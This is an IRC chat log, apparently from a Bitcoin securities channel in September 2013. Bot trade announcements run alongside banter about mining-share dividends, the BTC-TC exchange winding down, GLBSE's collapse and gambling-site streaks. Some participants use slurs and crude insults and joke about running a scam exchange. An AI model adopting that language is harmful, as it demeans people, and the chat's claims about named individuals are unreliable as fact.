[BTC-GROWTH] 30 @ 0.07791 = 2.3373 BTC [+] Sep 24 20:28:52 it will go away after some time Sep 24 20:28:58 in my apex account I meamn Sep 24 20:29:13 nothing to do with it Sep 24 20:29:35 sorry in my mpex account (problems wit autocorrection) Sep 24 20:29:40 [HAVELOCK] [NEOBEE] 39 @ 0.003 = 0.117 BTC [+] Sep 24 20:29:50 yeah Sep 24 20:29:55 it will go away after time Sep 24 20:30:02 just ignore it Sep 24 20:30:41 [MPEX] [S.MPOE] 9200 @ 0.00092529 = 8.5127 BTC [-] {2} Sep 24 20:30:45 thank you for your answer kakobrekla Sep 24 20:31:04 welcome Sep 24 20:31:42 [MPEX] [S.MPOE] 4545 @ 0.00092424 = 4.2007 BTC [-] {2} Sep 24 20:32:08 Probably it has been answered a lot of time but I was away and I wanted to be sure :) Sep 24 20:34:45 [BTCTC] [LABCOIN] 899 @ 0.001318 = 1.1849 BTC [-] Sep 24 20:36:47 [BTCTC] [LABCOIN] 725 @ 0.001319 = 0.9563 BTC [+] {3} Sep 24 20:37:48 [HAVELOCK] [AM1] 10 @ 1.6555 = 16.555 BTC [-] {4} Sep 24 20:37:49 [BTCTC] [LABCOIN] 716 @ 0.001319 = 0.9444 BTC [+] Sep 24 20:42:53 [BTCTC] [LABCOIN] 500 @ 0.001319 = 0.6595 BTC [+] Sep 24 20:44:55 [BTCTC] [LABCOIN] 4605 @ 0.001319 = 6.074 BTC [+] {2} Sep 24 20:45:56 [BTCTC] [LABCOIN] 254 @ 0.001319 = 0.335 BTC [+] Sep 24 20:48:59 [HAVELOCK] [AM1] 2 @ 1.548 = 3.096 BTC [-] {2} Sep 24 20:57:07 [BTCTC] [BASIC-MINING] 39 @ 0.079 = 3.081 BTC [-] Sep 24 20:57:07 [HAVELOCK] [AM1] 4 @ 1.73999994 = 6.96 BTC [+] {2} Sep 24 20:59:57 "They are already paying a higher dividend than Active Mining. This is amazing." I loled Sep 24 21:00:10 [HAVELOCK] [LABCO] [PAID] 0.05886136 BTC to 40`316 shares, 146 satoshi per share Sep 24 21:00:20 right on time Sep 24 21:00:25 amazing Sep 24 21:00:25 AMAZING COMPANY! Sep 24 21:01:36 that wasn't timed, I ignore assbot (just checked http://log.bitcoin-assets.com/) Sep 24 21:02:44 though it's less spammy these days Sep 24 21:02:53 try it out Sep 24 21:03:13 [BTCTC] [LABCOIN] 35950 @ 0.00134733 = 48.4365 BTC [+] {18} Sep 24 21:05:15 [BTCTC] [COGNITIVE] 1 @ 0.1424 BTC [+] Sep 24 21:06:16 [BTCTC] [LABCOIN] 1000 @ 0.00138828 = 1.3883 BTC [+] {3} Sep 24 21:07:17 [BTCTC] [ACTIVEMINING] 1000 @ 0.00158332 = 1.5833 BTC [-] {7} Sep 24 21:08:18 [BTCTC] [LABCOIN] 1157 @ 0.00139 = 1.6082 BTC [+] {4} Sep 24 21:09:11 lmao Sep 24 21:09:21 these fucktards and their "dividends". Sep 24 21:09:26 lol Sep 24 21:09:30 amazing company Sep 24 21:09:30 AMAZING COMPANY! Sep 24 21:09:45 a venture without income may not pay dividends. it's like speaking of a bull's milk. Sep 24 21:10:27 well since men can lactate, im sure some bull somewhere can too Sep 24 21:10:47 jesus now we got cow gender issues ? Sep 24 21:10:53 the div payment was more about being a positive sign that they didn't miss a deadline again Sep 24 21:10:54 i gotta pick better analogies Sep 24 21:11:24 lmao. deadline of "we will pay you 0.74% of what you send in two months hence" is not a deadline, either. Sep 24 21:11:48 deadlines must be things that are not wholly within the operator's control. making a statement is also not a deadline. Sep 24 21:13:23 [BTCTC] [ACTIVEMINING] 1000 @ 0.00155945 = 1.5595 BTC [-] {8} Sep 24 21:13:27 actually they have a proof for their income now Sep 24 21:13:30 it's funny. they announced 6 th/s but created so much drama that people went nuts, when they started to mine with 800 gh/s two weeks later Sep 24 21:13:41 it could very well be a few avalons Sep 24 21:13:49 but they have real income Sep 24 21:14:24 [BTCTC] [LABCOIN] 1100 @ 0.00139 = 1.529 BTC [+] Sep 24 21:14:59 what's the alleged float ? i forget. Sep 24 21:15:39 ;;calc 0.00139 * 10000000 Sep 24 21:15:39 13900 Sep 24 21:15:48 HIM is now at ~1.2TH Sep 24 21:16:02 and we didnt make a big deal out of it like some of these other mining ops Sep 24 21:16:27 [BTCTC] [BASIC-MINING] 53 @ 0.079 = 4.187 BTC [-] {2} Sep 24 21:17:05 a lot of other mining funds too - they are bigger than labcoin and activemining combined Sep 24 21:17:13 labcoin is a daytraders dream due to the high volatility and large trading volume, the price etc. is not really based on fundamentals at the moment Sep 24 21:17:21 maybe nastyfans isn't but that's it Sep 24 21:17:27 [BTCTC] [COGNITIVE] 11 @ 0.14230909 = 1.5654 BTC [-] {3} Sep 24 21:17:28 [BTCTC] [LABCOIN] 98 @ 0.00139 = 0.1362 BTC [+] Sep 24 21:20:31 [BTCTC] [LABCOIN] 350 @ 0.00139 = 0.4865 BTC [+] Sep 24 21:21:21 dexX7 no, that's not a daytrader. that's an noobtrader. Sep 24 21:21:32 [BTCTC] [LABCOIN] 19656 @ 0.00139997 = 27.5178 BTC [+] {17} Sep 24 21:21:32 [HAVELOCK] [AM100] 7 @ 0.0149 = 0.1043 BTC [+] Sep 24 21:21:32 daytraders trade actual companies. these differences are important. Sep 24 21:21:50 well, in that sense i am indeed a noob, so it's fine Sep 24 21:22:13 noobs are secksy Sep 24 21:22:33 [HAVELOCK] [AM100] 12 @ 0.015 = 0.18 BTC [+] Sep 24 21:22:34 [BTCTC] [ACTIVEMINING] 1050 @ 0.00153021 = 1.6067 BTC [-] {5} Sep 24 21:23:28 this constant temptation to substitute things for cheaper, easier, faster pseudothings is like our contemporary cancer. Sep 24 21:23:34 [BTCTC] [LABCOIN] 2156 @ 0.001439 = 3.1025 BTC [+] Sep 24 21:24:25 so what do you suggest as cure? Sep 24 21:24:35 [BTCTC] [LABCOIN] 1110 @ 0.001439 = 1.5973 BTC [+] {2} Sep 24 21:24:40 im not that advanced. Sep 24 21:25:05 why cure it? why not exploit it? :) Sep 24 21:25:10 but it seems to me the false idea that "we're all equal" is at the root of the problem. obviously in reality we aren't. but the pressure of confirming this ideology makes people hurt themselves. Sep 24 21:25:15 death is ultimate cure Sep 24 21:25:17 because it's not sustainable, pan Sep 24 21:25:23 like the guys living in houses they can't afford to match all the other "equal" guys who also. Sep 24 21:25:43 if it was a lot less work I'd start a "scams allowed" exchange Sep 24 21:25:43 so thus, i roil against equality, especially as contemporarily misunderstood. Sep 24 21:25:46 doesn't seem much of a cure. Sep 24 21:26:09 everything goes - issuers can issue new shares, there are no contracts Sep 24 21:26:30 because why ? Sep 24 21:26:56 why not? Sep 24 21:27:59 so why don't you get gender reassignment surgery then Sep 24 21:28:13 to add to the fun, the exchange operator would be anonymous, and thus, could decide to close down anytime and take all the money Sep 24 21:28:35 too expensive and painful. otherwise I'd do it Sep 24 21:28:39 though I like my penis Sep 24 21:29:39 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [-] Sep 24 21:29:43 butbutbut we will have colored coins and they will solve all these problems.. oh nevermind Sep 24 21:29:53 lol Sep 24 21:29:59 jurov he's new. Sep 24 21:30:40 [BTCTC] [LABCOIN] 690 @ 0.00144106 = 0.9943 BTC [+] {2} Sep 24 21:30:40 in other news, atruk made a blog. Sep 24 21:30:41 http://www.thedrinkingrecord.com/ Sep 24 21:30:44 Bingo Blog | of Bitcoin and Boingo Sep 24 21:33:43 [BTCTC] [LABCOIN] 100 @ 0.00144761 = 0.1448 BTC [+] {3} Sep 24 21:33:43 [MPEX] [S.MPOE] 10462 @ 0.00092227 = 9.6488 BTC [-] {2} Sep 24 21:40:50 [BTCTC] [BITVPS] 140 @ 0.00155 = 0.217 BTC [+] Sep 24 21:40:50 [BTCTC] [LABCOIN] 5000 @ 0.00147205 = 7.3603 BTC [+] {7} Sep 24 21:41:51 [BTCTC] [BITVPS] 200 @ 0.00156 = 0.312 BTC [+] Sep 24 21:42:52 [BTCTC] [ACTIVEMINING] 300 @ 0.001674 = 0.5022 BTC [+] Sep 24 21:45:55 [BTCTC] [COGNITIVE] 3 @ 0.164 = 0.492 BTC [+] Sep 24 21:46:29 leotreasure what's that stuff all about ? Sep 24 21:46:56 [BTCTC] [COGNITIVE] 1 @ 0.1664 BTC [+] Sep 24 21:51:00 [BTCTC] [ASICMINER-PT] 10 @ 1.48399999 = 14.84 BTC [-] {5} Sep 24 21:55:04 [HAVELOCK] [AM100] 123 @ 0.015 = 1.845 BTC [+] Sep 24 21:58:07 [BTCTC] [BITVPS] 2000 @ 0.001586 = 3.172 BTC [+] {2} Sep 24 22:01:10 [MPEX] [S.MPOE] 24642 @ 0.00091905 = 22.6472 BTC [-] {4} Sep 24 22:01:11 [HAVELOCK] [AM100] 87 @ 0.0151 = 1.3137 BTC [+] Sep 24 22:06:15 [BTCTC] [PETA-MINE] 6 @ 0.5112 = 3.0672 BTC [-] {2} Sep 24 22:06:16 [MPEX] [S.MPOE] 4494 @ 0.00091835 = 4.1271 BTC [-] Sep 24 22:08:00 are things finally going to quiet down around here? Sep 24 22:08:55 somewhat. Sep 24 22:09:09 im sure we'll have glbse 3.0 eventually. Sep 24 22:09:15 people being people and whatnot. Sep 24 22:10:19 [BTCTC] [LABCOIN] 200 @ 0.00145 = 0.29 BTC [+] {2} Sep 24 22:17:27 [BTCTC] [LABCOIN] 484 @ 0.00136368 = 0.66 BTC [-] {4} Sep 24 22:29:59 Scrat what's jd investment at these days ? Sep 24 22:30:57 gee today's log is great. Sep 24 22:31:38 ThickAsThieves: Sep 24 22:31:38 so burnside's timing is awesome << tis how one learns, tat. Sep 24 22:33:25 ;;seen burnside Sep 24 22:33:25 burnside was last seen in #bitcoin-assets 8 weeks, 6 days, 0 hours, 58 minutes, and 0 seconds ago: lol Sep 24 22:34:50 Wow. Sep 24 22:34:58 That's one for the books. Sep 24 22:39:11 lol Sep 24 22:39:21 ;;seen nefario Sep 24 22:39:21 nefario was last seen in #bitcoin-assets 52 weeks, 0 days, 23 hours, 39 minutes, and 10 seconds ago: Those assets are not listed or traded anymore Sep 24 22:40:48 pump it ChaangNoi https://bitcointalk.org/index.php?topic=67547.msg3226901#msg3226901 Sep 24 22:41:31 Hm Sep 24 22:41:35 A year ago. Sep 24 22:42:34 28ths lol Sep 24 22:43:35 ;;seen Pirate@40 Sep 24 22:43:35 I have not seen Pirate@40. Sep 24 22:43:53 [BTCTC] [ACTIVEMINING] 897 @ 0.00164249 = 1.4733 BTC [-] {3} Sep 24 22:44:02 at is not valid irc nick char also he was never here Sep 24 22:44:03 lol a year. Sep 24 22:44:20 pirate was never here. also, pirateat40 Sep 24 22:44:39 ;;seen Pirateat40 Sep 24 22:44:39 Pirateat40 was last seen in #bitcoin-assets 5 weeks, 6 days, 22 hours, 58 minutes, and 3 seconds ago: lame Sep 24 22:44:53 [BTCTC] [ACTIVEMINING] 449 @ 0.001638 = 0.7355 BTC [-] Sep 24 22:44:53 lame, indeed. Sep 24 22:47:06 What's the story with JD? Over 4500 in the hole. Sep 24 22:48:34 TomServo apparently some guy has been winning 15k Sep 24 22:48:48 5167 Sep 24 22:48:54 5268 Sep 24 22:48:57 [MPEX] [S.MPOE] 7011 @ 0.00092163 = 6.4615 BTC [+] {2} Sep 24 22:49:58 [HAVELOCK] [SDSTM] 40 @ 0.00256 = 0.1024 BTC [+] Sep 24 22:51:31 does JD has an api for this Sep 24 22:52:57 isn;'t this exactly like thart earlier guy, celeste or w/e ? Sep 24 22:53:00 straight wins Sep 24 22:54:12 14:48:49 (14) HOW Sep 24 22:54:13 heh Sep 24 22:55:13 lol Sep 24 22:55:36 well the first time it was perfectly credible that it's yiou know, random shit happens. Sep 24 22:56:02 but there's been two large series and no numerous small serioes in between them. Sep 24 22:56:07 this seems very strange. Sep 24 22:56:26 dooglus is no longer on this chan eh Sep 24 22:56:30 seems like nobody's auditing these "provably fair" operators Sep 24 22:56:48 assuming this is one of those Sep 24 22:56:59 it is one of those yeah. Sep 24 22:57:05 [HAVELOCK] [AM1] 1 @ 1.65 BTC [-] Sep 24 22:57:08 i think you can audit it yourself Sep 24 22:57:15 i don't care Sep 24 22:57:21 more than happy to provide services though Sep 24 22:57:27 in fact, a blog dedicated to random-weekly audits of provably fair betting sites would be interesting Sep 24 22:57:55 if only there were some profit to be had in doing that Sep 24 22:58:06 [HAVELOCK] [AM100] 54 @ 0.01548925 = 0.8364 BTC [+] {2} Sep 24 22:58:16 i suppose that if i uncovered malfeasance during the process i could place a bitbet Sep 24 22:58:42 but i don't tend to gamble with my working time, i prefer to sell those hours. Sep 24 22:59:07 [HAVELOCK] [AM100] 48 @ 0.01568365 = 0.7528 BTC [+] {2} Sep 24 22:59:08 unestimatable upside Sep 24 22:59:12 quantifiable downside Sep 24 22:59:31 vs known upside and extremely low risk Sep 24 22:59:36 takers? takers? Sep 24 23:00:32 carry on then. Sep 24 23:00:49 well this'd be one of those loss leaders. Sep 24 23:02:50 h Sep 24 23:02:59 something to train a camwhore on, so to speak Sep 24 23:03:27 or shit just pay someone far away to do Sep 24 23:03:29 hm Sep 24 23:03:48 great idea mp thanks a bunch Sep 24 23:05:27 just as long as they do a good job. Sep 24 23:06:14 [BTCTC] [LABCOIN] 11158 @ 0.00126522 = 14.1173 BTC [-] {14} Sep 24 23:07:15 [BTCTC] [ACTIVEMINING] 445 @ 0.00163974 = 0.7297 BTC [+] {2} Sep 24 23:08:24 hey man i'd be thrilled if i do a decent job of the training Sep 24 23:09:08 mircea_popescu: I thought you were a large investor; 30k invested at -5.2k profit right now Sep 24 23:11:25 http://finance.yahoo.com/news/people-falling-fake-apple-ios-115719246.html Sep 24 23:11:28 Fake Apple Ad Says iOS 7 Will Make Your iPhone Waterproof And People Fell For It - Yahoo Finance Sep 24 23:12:07 mircea_popescu: but why are you asking me? :F Sep 24 23:16:03 lol Rulother macfags at its finest Sep 24 23:17:26 Yes I had a good laugh Sep 24 23:17:43 Have you heard about getting them to recharge the phone by using the microwave? Sep 24 23:18:24 nope Sep 24 23:19:11 http://en.rocketnews24.com/2013/01/23/just-pop-it-in-the-microwave-and-charge-but-really-iphone-owners-should-know-better-shouldnt-they/ Sep 24 23:19:15 Just Pop It In The Microwave and Charge But Really, iPhone Owners should Know Better, Shouldn’t T Sep 24 23:21:02 4Chan at it's finest Sep 24 23:27:21 Scrat nah, i divested in july. Sep 24 23:27:22 http://trilema.com/2013/for-lack-of-a-nail/ Sep 24 23:27:25 For lack of a nail pe Trilema - Un blog de Mircea Popescu. Sep 24 23:27:29 and i asked you because you were discussing it in the log earlier. Sep 24 23:30:39 [BTCTC] [MININGCO.ETF] 7 @ 0.03714285 = 0.26 BTC [+] {3} Sep 24 23:32:41 [BTCTC] [LABCOIN] 400 @ 0.001351 = 0.5404 BTC [+] Sep 24 23:33:42 [BTCTC] [LABCOIN] 2000 @ 0.00135 = 2.7 BTC [-] Sep 24 23:35:46 [HAVELOCK] [CFIG] 1 @ 0.107215 BTC [-] Sep 24 23:39:48 [HAVELOCK] [AM100] 35 @ 0.01506 = 0.5271 BTC [-] Sep 24 23:41:50 [HAVELOCK] [NEOBEE] 200 @ 0.00290004 = 0.58 BTC [-] Sep 24 23:41:51 [HAVELOCK] [CFIG] 3 @ 0.107215 = 0.3216 BTC [-] Sep 24 23:50:59 [BTCTC] [ACTIVEMINING] 485 @ 0.0016422 = 0.7965 BTC [+] {2} Sep 24 23:53:42 CB.IDIFF.* holders,request transfer to Bitfunder here: https://coinbr.com/btct/idiff_1 Sep 24 23:56:03 [BTCTC] [LABCOIN] 200 @ 0.00131967 = 0.2639 BTC [-] {2} Sep 25 00:00:07 [BTCTC] [FN] [DMS.SELLING] 25 @ 0.006611 = 0.1653 BTC [-] Sep 25 00:01:08 [BTCTC] [BASIC-MINING] 69 @ 0.07664404 = 5.2884 BTC [-] {6} Sep 25 00:02:09 [BTCTC] [BASIC-MINING] 156 @ 0.07351461 = 11.4683 BTC [-] {2} Sep 25 00:10:17 [BTCTC] [ACTIVEMINING] 423 @ 0.00164319 = 0.6951 BTC [+] {2} Sep 25 00:11:18 [BTCTC] [PAJKA.BOND] 62 @ 0.008001 = 0.4961 BTC [-] Sep 25 00:14:21 [BTCTC] [PAJKA.BOND] 60 @ 0.01889 = 1.1334 BTC [+] Sep 25 00:14:22 [MPEX] [S.MPOE] 12000 @ 0.00092644 = 11.1173 BTC [+] {3} Sep 25 00:18:26 [BTCTC] [COGNITIVE] 4 @ 0.1664 = 0.6656 BTC [+] Sep 25 00:19:28 [BTCTC] [COGNITIVE] 1 @ 0.1665 BTC [+] Sep 25 00:21:11 https://bitcointalk.org/index.php?topic=301008.new#new Sep 25 00:21:17 ATTENTION clueless noobs/btct "investors" Sep 25 00:21:29 [BTCTC] [ACTIVEMINING] 200 @ 0.001662 = 0.3324 BTC [+] Sep 25 00:24:50 why bother you already achieved the highest ignore level possible, its apropriatley golden color Sep 25 00:25:33 [BTCTC] [LABCOIN] 362 @ 0.001349 = 0.4883 BTC [+] Sep 25 00:26:04 lol that matters now ? Sep 25 00:26:08 no it's red iirc Sep 25 00:26:23 orly Sep 25 00:26:24 i can scarcely think of a more absolute display of impotence. "oh i ignore your pr pls care" Sep 25 00:27:29 its a medal of highest order and now a bunch of ppl cant read you and those who do, do not, so yeah Sep 25 00:27:35 [HAVELOCK] [AM100] 14 @ 0.01587 = 0.2222 BTC [-] Sep 25 00:28:36 [BTCTC] [LABCOIN] 236 @ 0.00131572 = 0.3105 BTC [-] {3} Sep 25 00:29:37 [BTCTC] [BASIC-MINING] 4 @ 0.075 = 0.3 BTC [+] Sep 25 00:29:37 [MPEX] [S.MPOE] 489 @ 0.00092457 = 0.4521 BTC [-] Sep 25 00:30:28 ;;seen thestringpuller Sep 25 00:30:28 thestringpuller was last seen in #bitcoin-assets 1 hour, 57 minutes, and 2 seconds ago: ;;seen burnside Sep 25 00:30:36 lol mkay Sep 25 00:30:38 [BTCTC] [ACTIVEMINING] 376 @ 0.00164552 = 0.6187 BTC [-] {2} Sep 25 00:30:39 inception Sep 25 00:30:44 except most those ignores come from socks/mains of people who read her avidlyh. Sep 25 00:31:36 afaik you must be an established member to give extra ignore points, but whatever Sep 25 00:32:07 problem is "established" means "made 50 posts" or something. Sep 25 00:35:48 there are two guys going at it on havelock over cbtc shares, looks like a bidding war Sep 25 00:38:46 [BTCTC] [LABCOIN] 362 @ 0.00129933 = 0.4704 BTC [-] {2} Sep 25 00:40:28 established is 100 posts, yeah Sep 25 00:40:47 anger noobs, get orange Sep 25 00:40:48 [BTCTC] [LABCOIN] 401 @ 0.00129959 = 0.5211 BTC [+] {3} Sep 25 00:42:00 herpderp. Sep 25 00:43:20 O.o 6307 articles Sep 25 00:44:39 some people have no life, you know ? Sep 25 00:44:45 haha Sep 25 00:48:39 and like 90k comments or so, comes to a dozen per. Sep 25 00:56:03 [BTCTC] [PETA-MINE] 1 @ 0.5202 BTC [+] Sep 25 00:58:17 23:57.03 ( Ken` ) btctc out, secondmarket in Sep 25 00:58:17 23:57.05 ( Ken` ) problem? Sep 25 00:58:24 23:50.16 ( Ken` ) http://www.reddit.com/r/Bitcoin/comments/1n1tie/something_big_coming_to_secondmarket_for_bitcoin/ Sep 25 00:58:43 lolk Sep 25 00:58:51 also october 31st ? Sep 25 01:03:50 https://bitcointalk.org/index.php?topic=125629.msg3227733#msg3227733 burnside has spoken Sep 25 01:03:54 [BTC-TC] Virtual Community Exchange [WINDING DOWN] Sep 25 01:05:37 ThickAsThieves: Sep 25 01:05:37 why is jgarzik out of the woodwork with telling everyone to make a decentralized exchange? Sep 25 01:05:59 because the power rangers still cling to the delusion of relevance, but meanwhile are starting to comprehend what killed them. Sep 25 01:06:12 except, they misrepresent it as both future and avoidable, when it's really past and done. Sep 25 01:06:22 uh how did this came up _now_ ? Sep 25 01:06:45 cause im slowly going through logs. Sep 25 01:06:58 i read a little, something happens, read a little more etc. Sep 25 01:07:28 really, you use that thing... ok ok carry on Sep 25 01:08:14 [BTCTC] [ACTIVEMINING] 199 @ 0.00165298 = 0.3289 BTC [+] {2} Sep 25 01:10:16 [BTCTC] [ACTIVEMINING] 170 @ 0.001654 = 0.2812 BTC [+] Sep 25 01:10:46 sure i do. Sep 25 01:11:01 key tool. Sep 25 01:11:17 [BTCTC] [ACTIVEMINING] 269 @ 0.001654 = 0.4449 BTC [+] {2} Sep 25 01:13:19 [BTCTC] [ACTIVEMINING] 105 @ 0.001654 = 0.1737 BTC [+] Sep 25 01:14:09 pankkake: those should go to zero… unless maybe there's a sale of the source code <<< ahh how this brings memories. Sep 25 01:14:21 anyone rememvber the bitcoinica "valuable" source code and the bitfinex muppets ? Sep 25 01:14:55 ThickAsThieves: he edited most details out of the contract a while ago << http://trilema.com/2012/gpg-contracts/ i say! Sep 25 01:16:54 BigBitz burnside is some dork that was running a ltc exchange, then when glbse popped he figured "o noes, i have all the needed expertise to re-do the thing". Sep 25 01:19:26 [BTCTC] [ACTIVEMINING] 100 @ 0.001549 = 0.1549 BTC [-] Sep 25 01:25:05 Ah OK. Sep 25 01:37:44 [MPEX] [S.MPOE] 4050 @ 0.00091867 = 3.7206 BTC [-] Sep 25 01:39:46 [BTCTC] [ASICMINER-PT] 5 @ 1.4852 = 7.426 BTC [+] {2} Sep 25 01:46:30 mircea_popescu: you mentioned gpg contracts.. only a few days ago i realized how cool mpex really is or to be more specific i realized the beautiy of the "mechanism" you use to transmit orders Sep 25 01:46:38 in that sense: good job! Sep 25 01:46:41 yw! Sep 25 01:50:57 [BTCTC] [ASICMINER-PT] 6 @ 1.486 = 8.916 BTC [+] Sep 25 01:52:59 [BTCTC] [FN] [BTC-GROWTH] 4 @ 0.0750225 = 0.3001 BTC [-] {2} Sep 25 01:57:03 [BTCTC] [LABCOIN] 13798 @ 0.00126901 = 17.5098 BTC [-] {6} Sep 25 01:59:05 [BTCTC] [LABCOIN] 1701 @ 0.001268 = 2.1569 BTC [-] Sep 25 02:03:09 [BTCTC] [LABCOIN] 1000 @ 0.00124778 = 1.2478 BTC [-] {5} Sep 25 02:05:11 [MPEX] [S.MPOE] 1143 @ 0.00091722 = 1.0484 BTC [-] Sep 25 02:18:24 [BTCTC] [ACTIVEMINING] 1000 @ 0.0015611 = 1.5611 BTC [+] {3} Sep 25 02:22:28 [BTCTC] [LABCOIN] 1262 @ 0.00122138 = 1.5414 BTC [-] {8} Sep 25 02:27:33 [BTCTC] [NASTY-PT] 100 @ 0.001467 = 0.1467 BTC [-] Sep 25 02:29:35 [BTCTC] [LABCOIN] 230 @ 0.00127531 = 0.2933 BTC [+] {3} Sep 25 02:39:45 [BTCTC] [BTC-TRADING-PT] 80 @ 0.01504361 = 1.2035 BTC [-] {8} Sep 25 02:56:39 so i guess this channel is essentially worthless now Sep 25 02:59:40 how is Namworld handling the closure of btct? Can I move my shares or will he pay out each of us? Sep 25 03:05:22 ;;later tell benkay sounds a lot like forth. Sep 25 03:05:22 The operation succeeded. Sep 25 03:06:48 much more entertaining documentation though Sep 25 03:10:22 i think i put up a link to a discussion of forth recently, seemed pretty good points as to why nobody cares. Sep 25 03:11:42 anuway, the newfound zen inclination to simplicity on the web is making me smile. Sep 25 03:11:52 i thought i was so doomed by css, srsly. Sep 25 03:16:42 i'd take a link to that Sep 25 03:29:33 Sep 11 22:33:29 this is pretty good shit lol http://www.yosefk.com/blog/my-history-with-forth-stack-machines.html Sep 25 03:37:21 ThickAsThieves: in the am1 overview on hl under "links" there is a part of the link to the btctalk thread missing Sep 25 03:38:50 ThickAsThieves: also: https://bitcointalk.org/index.php?topic=99497.msg3222593#msg3222593 ;) Sep 25 03:49:31 http://bitbet.us/new/ Sep 25 03:49:44 can now create private bets by entering a password. Sep 25 03:50:24 ThickAsThieves ^ Sep 25 04:04:16 and the people went mad! Sep 25 04:07:19 lol Sep 25 04:07:25 just what everyone always wanted! Sep 25 04:08:46 oh shit assbot Sep 25 04:08:50 y nobody tells me Sep 25 04:09:25 come! Sep 25 04:10:48 every day something new Sep 25 04:10:53 thats how Sep 25 04:11:10 i guess you can call it that Sep 25 04:11:15 [MPEX] [S.MPOE] 9250 @ 0.00091608 = 8.4737 BTC [-] Sep 25 04:11:46 o yeah a bit of pain Sep 25 04:11:49 rather Sep 25 04:19:23 [BTCTC] [LABCOIN] 2656 @ 0.00118409 = 3.1449 BTC [-] {9} Sep 25 04:21:25 [BTCTC] [ACTIVEMINING] 339 @ 0.00165 = 0.5594 BTC [+] {2} Sep 25 04:21:26 [BTCTC] [LABCOIN] 1882 @ 0.00117531 = 2.2119 BTC [-] {2} Sep 25 04:22:26 [BTCTC] [LABCOIN] 5000 @ 0.00116638 = 5.8319 BTC [-] {6} Sep 25 04:23:28 [BTCTC] [ACTIVEMINING] 225 @ 0.001654 = 0.3722 BTC [+] Sep 25 04:24:28 [BTCTC] [LABCOIN] 4103 @ 0.0011538 = 4.734 BTC [-] {7} Sep 25 04:24:29 [BTCTC] [ACTIVEMINING] 167 @ 0.001654 = 0.2762 BTC [+] Sep 25 04:26:31 [BTCTC] [ACTIVEMINING] 335 @ 0.00165455 = 0.5543 BTC [+] {3} Sep 25 04:28:33 [BTCTC] [ASICMINER-PT] 2 @ 1.4105 = 2.821 BTC [+] {2} Sep 25 04:30:35 [BTCTC] [ASICMINER-PT] 1 @ 1.421 BTC [+] Sep 25 04:33:07 ;;seen mod6 Sep 25 04:33:08 mod6 was last seen in #bitcoin-assets 2 days, 2 hours, 43 minutes, and 12 seconds ago: this is for the gzip Sep 25 04:33:22 stop lurkin' mod6 Sep 25 04:33:38 [BTCTC] [LABCOIN] 2200 @ 0.00115226 = 2.535 BTC [-] {2} Sep 25 04:37:42 [BTCTC] [ASICMINER-PT] 8 @ 1.409875 = 11.279 BTC [-] {3} Sep 25 04:38:43 [BTCTC] [LABCOIN] 500 @ 0.001155 = 0.5775 BTC [+] Sep 25 05:01:04 [BTCTC] [DMS.MINING] 81 @ 0.001247 = 0.101 BTC [-] Sep 25 05:01:04 [HAVELOCK] [AM100] 8 @ 0.0170425 = 0.1363 BTC [+] {2} Sep 25 05:01:12 mircea_popescu: is there any detailed report about the glbse closure you might point me to? Sep 25 05:02:05 [BTCTC] [FN] [BTC-GROWTH] 550 @ 0.07501278 = 41.257 BTC [-] {3} Sep 25 05:02:43 detailed, no. in summary, its something like this : early spring 2012, nefario allowed a bunch of scammers (goat, the "bankers") to run dubious pirate "pass throughs" pseudoinvestments that soon enough dominated the exchange, doing like 90%+ of all trade, and also made its volume almost comparable to mpex at the time. Sep 25 05:02:51 late autumn 2012, nefario closed shop suddenly. Sep 25 05:03:17 for compare and contrast reasons, burnside did the exact same thing sprind 2013, closed autumn 2013. not quite as suddenly. Sep 25 05:03:51 http://trilema.com/2012/the-stockexchange-shareholders-on-welfare/ Sep 25 05:03:55 The stockexchange shareholders on welfare pe Trilema - Un blog de Mircea Popescu. Sep 25 05:03:59 a transcript of glbse shareholder meeting at the time survives. Sep 25 05:04:02 ah ty Sep 25 05:05:36 hehe no Sep 25 05:05:51 but i think i'm able to extract the valuable parts Sep 25 05:06:29 you what ? Sep 25 05:15:18 [BTCTC] [ASICMINER-PT] 4 @ 1.411 = 5.644 BTC [+] {2} Sep 25 05:16:19 [HAVELOCK] [AM100] 25 @ 0.01725 = 0.4313 BTC [+] Sep 25 05:19:22 [BTCTC] [ACTIVEMINING] 418 @ 0.001692 = 0.7073 BTC [+] {3} Sep 25 05:24:28 [BTCTC] [LABCOIN] 1500 @ 0.00117577 = 1.7637 BTC [-] {4} Sep 25 05:27:12 lol why is a bunker needed ? Sep 25 05:29:04 mircea_popescu: to quell those distractions like the sun and the moon. Sep 25 05:29:24 they can just take turns. Sep 25 05:31:08 lmao so some dork on the forum named himself "question authority" and has a link to the grouptink article ON WIKIPEDIA in his signature Sep 25 05:31:11 and i can't stop laughing. Sep 25 05:31:21 it's sad people don't realise how much comedic relief they provide. Sep 25 05:32:39 mircea_popescu: I keep forgetting you have in the plural for some reason. It would take a lot of wikidorks to match the raw fecal encephalitits of the recent Burnside posts though. Sep 25 05:33:27 guy's in a world of his own. Sep 25 05:34:03 <3JTAAADX2> just-dice -5,118 in the hole Sep 25 05:35:02 Well of the two risky yet potentially scammy low profit BTC niches, Burnside chose a securities exchange that didn't even take half measures pretending safety. Sep 25 05:35:07 i mean... kid goes to chew power cables. you go don't chew power cables. it goes "well i had a lot of respect for you before but now that you tell me to not chew power cables i don't have any more respect for you". gets killed, and then it's a case of "we (who ?!) were killing you in all respects that matter. by being dead." Sep 25 05:35:36 3JTAAADX2 and forumers got all butthurt when pr told them to go play there instead of "investing" Sep 25 05:35:38 [BTCTC] [DMS.MINING] 1091 @ 0.0012487 = 1.3623 BTC [+] {4} Sep 25 05:37:17 mircea_popescu: pretty much. I especially like the idiots who interpret that as invest in Just-Dice instead of gamble on Just-Dice and get burned because they can't remember they read a whole paragraph (pr maybe they tried and forgot?). Sep 25 05:37:41 [MPEX] [S.MPOE] 2981 @ 0.00091399 = 2.7246 BTC [-] Sep 25 05:37:59 https://bitcointalk.org/index.php?topic=296204 Sep 25 05:38:07 lol goons talking to themselves on selfmod thread. Sep 25 05:38:08 The BFL timeline: a collaborative schadenfreude project Sep 25 05:38:42 why are those people so frail anyway ? always must have the protection of deleting posts and shit, got forbid the holy echo chamber is threatened. Sep 25 05:39:37 mircea_popescu: I don't think that has as much potential for AMAZING COMPANY Memes as that SolarWIndMIning Company that materialized late last week. Sep 25 05:39:38 AMAZING COMPANY! Sep 25 05:40:08 wait is that diablo's thing rehashed or unrelated ? Sep 25 05:40:48 mircea_popescu: Apparently unrelated, bunch of no names that were all born in July it seems, but they have blogs born in July to support them... Sep 25 05:41:01 a well then. Sep 25 05:42:04 mircea_popescu: 